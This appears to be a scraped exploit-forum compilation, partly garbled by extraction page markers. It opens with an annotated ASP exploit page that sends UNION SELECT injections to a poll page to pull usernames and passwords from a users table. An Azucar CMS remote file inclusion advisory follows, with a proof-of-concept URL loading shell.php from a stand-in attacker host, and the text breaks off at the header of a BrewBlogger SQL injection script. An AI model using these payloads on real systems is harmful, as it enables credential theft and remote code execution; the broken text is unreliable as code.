arama=InStr1, targettext, "union" ,1 arama2=InStr1, targettext, "http://" ,1 If targettext="" Then Response.Redirect"exploit1.asp?islem=hata1" Else If arama>0 then Response.Redirect"expl
Trang 1ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="backgroun
d-color: #808080"><br><input type="text" name="id" value="1" size="25" styl e="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>
</table>
<div id=htmlAlani></div>
<%
' Reads the "islem" query-string value and prints one of three fixed
' validation messages after the page has redirected to itself with an error code.
' Only constant strings are written; the query-string value is compared, never echoed.
islem = Request.QueryString("islem")
' hata1: the submitted text1 field was empty.
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Please complete to the whole spaces</font>"
End If
' hata2: the submitted text1 field contained the word "union".
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Please right character use</font>"
End If
' hata3: the submitted text1 field did not contain "http://".
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Add ""http://""</font>"
End If
%>
<%
' Handles the form post (islem=get): reads the two form fields and checks the
' base URL before any request is made. The four Ifs opened here are closed at
' the very end of the page.
If islem = "get" Then
' Both names are the same page; each is appended to the submitted base URL later.
string1="default1.asp"
string2="default1.asp"
' cek is the "id" form field. Nothing in this block validates or encodes it.
cek= Request.Form("id")
' targettext is the base URL typed into the form. It later becomes the address
' this server posts to, so whoever can submit the form chooses the request target.
targettext = Request.Form("text1")
' NOTE(review): the "Trang 2" prefix on the next line looks like a page marker
' left by text extraction rather than script - confirm against the original.
Trang 2arama=InStr(1, targettext, "union" ,1)
' Text-mode (case-insensitive) search for "http://" anywhere in the value,
' not only at its start.
arama2=InStr(1, targettext, "http://" ,1)
' Empty URL: back to the form with hata1.
If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1")
Else
' URL contains "union": back to the form with hata2.
If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2")
Else
' URL lacks "http://": back to the form with hata3.
If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3")
Else
%>
<%
' Build the two request URLs by appending the page name to the submitted base URL.
' string1 and string2 hold the same value, so both URLs are identical.
target1 = targettext+string1
target2 = targettext+string2
' take(come): sends one synchronous POST (third Open argument FALSE) to the URL
' in come and returns the response body as text.
' The form body carries a UNION SELECT in the Poll_ID field that names the
' username column of the users table; the page-level value cek is appended as-is.
' Defender's reading: this can only return data if the receiving page builds its
' SQL by concatenating Poll_ID (presumably the case for the targeted poll page).
' Binding Poll_ID as a numeric parameter, or rejecting non-integer values, removes
' the flaw. In request logs, look for a POST with Voteit=1 whose Poll_ID contains
' "union" and "select".
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
Open "POST" , come, FALSE
' The next two lines are one statement split by extraction: the header call,
' then send with the form body as its argument.
setRequestHeader "Content-Type", "application/x-www-form-urlencoded" send
"Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20wh ere%20user_id%20like%20"+cek
' Return value: the raw response text.
take = Responsetext
End With
SET objtake = Nothing
End Function
' take1(come1): same request as take(), except that the UNION SELECT names the
' password column of the users table. Returns the response body as text.
' Defender's reading: a response that contains the stored value in usable form
' implies the application keeps passwords in a directly readable form (presumably
' plaintext or unsalted hashes - verify). Alongside parameterising Poll_ID, store
' passwords with a salted, slow hash so a read of this column yields less.
Public Function take1(come1)
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake1
Open "POST" , come1, FALSE
setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
' NOTE(review): "Trang 3" on the next line looks like an extraction page marker
' fused onto the send call - confirm against the original.
Trang 3send
"Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20wh ere%20user_id%20like%20"+cek
' Return value: the raw response text.
take1 = Responsetext
End With
SET objtake1 = Nothing
End Function
' Issue both requests, then cut a fixed-width slice out of each response.
get_username = take(target1)
get_password = take1(target2)
' Position of the marker text in the first response. InStr returns 0 when the
' marker is absent, and that case is not checked.
getdata=InStr(get_username,"Poll Question:</b> " )
' 14 characters starting 24 past the marker position. The position found in the
' first response is reused unchanged for the second response.
username=Mid(get_username,getdata+24,14)
passwd=Mid(get_password,getdata+24,14)
%>
<!-- Result table. username and passwd are slices of a remote server's response.
     The inline ASP output tags write them without Server.HTMLEncode, both as
     element text and inside the value attribute of the hidden field1 input, so
     any markup in that response is rendered by this page.
     NOTE(review): "Trang 4" before the closing table tag looks like an extraction
     page marker. write() and functionControl1() are not defined in the visible
     part of the page. -->
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0"
style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808 080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style background='#808080';" onmouseout="javascript:this.style.background='#80 8000';"> &n bsp;
<b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Ver dana"><%=username%></font></b></td>
</tr>
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style background='#808080';" onmouseout="javascript:this.style.background='#80 8000';"> &n bsp;
<b><font size="2" face="Arial"> User Password:</font></b></td> <td width="50%"> <b><font color="#C0C0C0" size="2" face="Ver dana"><%=passwd%></font></b></td>
</tr>
Trang 4</table>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p
>
</form>
</center>
<script language="JavaScript">
write()
functionControl1()
</script>
</body>
</html>
<%
' Close the four nested Ifs opened during validation, innermost first:
' the "http://" check, the "union" check, the empty-field check, then islem = "get".
End If
End If
End If
End If
' NOTE(review): objtake is only assigned inside take(), which already releases it;
' confirm whether this page-level reset has any effect.
Set objtake = Nothing
%>
Black_hat_cr(HCE)
Azucar CMS <= 1.3 (admin/index_sitios.php) File Inclusion Vulnerability
Code:
+ -
+ Azucar CMS <= 1.3 (_VIEW) Remote File Include Vulnerability
+ -
+ Affected Software : Azucar CMS <= 1.3
+ Download : http://downloads.sourceforge.net/azucarcms/azucarcms1.3.zip
+ Description : "Azucar is a modular content management system designed to
be extremely user friendly"
+ Class : Remote File Inclusion
+ Risk : High (Remote File Execution)
+ Found By : nuffsaid <nuffsaid[at]newbslove.us>
+ -
+ Details:
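+ Azucar CMS admin/index_sitios.php passes the $_GET[_VIEW] parameter straight to
+ include(), so a file named in the request is loaded and executed on the server.
+ A remote URL is accepted only where the PHP configuration allows URL includes
+ (allow_url_fopen, plus allow_url_include on PHP 5.2 and later). The fix is to choose
+ the view from a fixed list of local files instead of including the request value.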
+
+ Vulnerable Code:
+ admin/index_sitios.php, line(s) 14-15:
+ -> 14-15: if (isset($_GET[_VIEW])) include($_GET[_VIEW]);
+
+ Proof Of Concept:
+
http://[target]/[path]/admin/index_sitios.php?_VIEW=http://evilsite.com/shell.php + -
black_hat_cr(HCE)
BrewBlogger 1.3.1 (printLog.php) Remote SQL Injection Vulnerability
PHP Code:
#!/usr/bin/perl
##################################################################
#########################
#Target:
#
# BrewBlogger 1.3.1
# http://brewblogger.zkdigital.com
#
#Vulnerability:
#
# SQL Injection
#
#Description: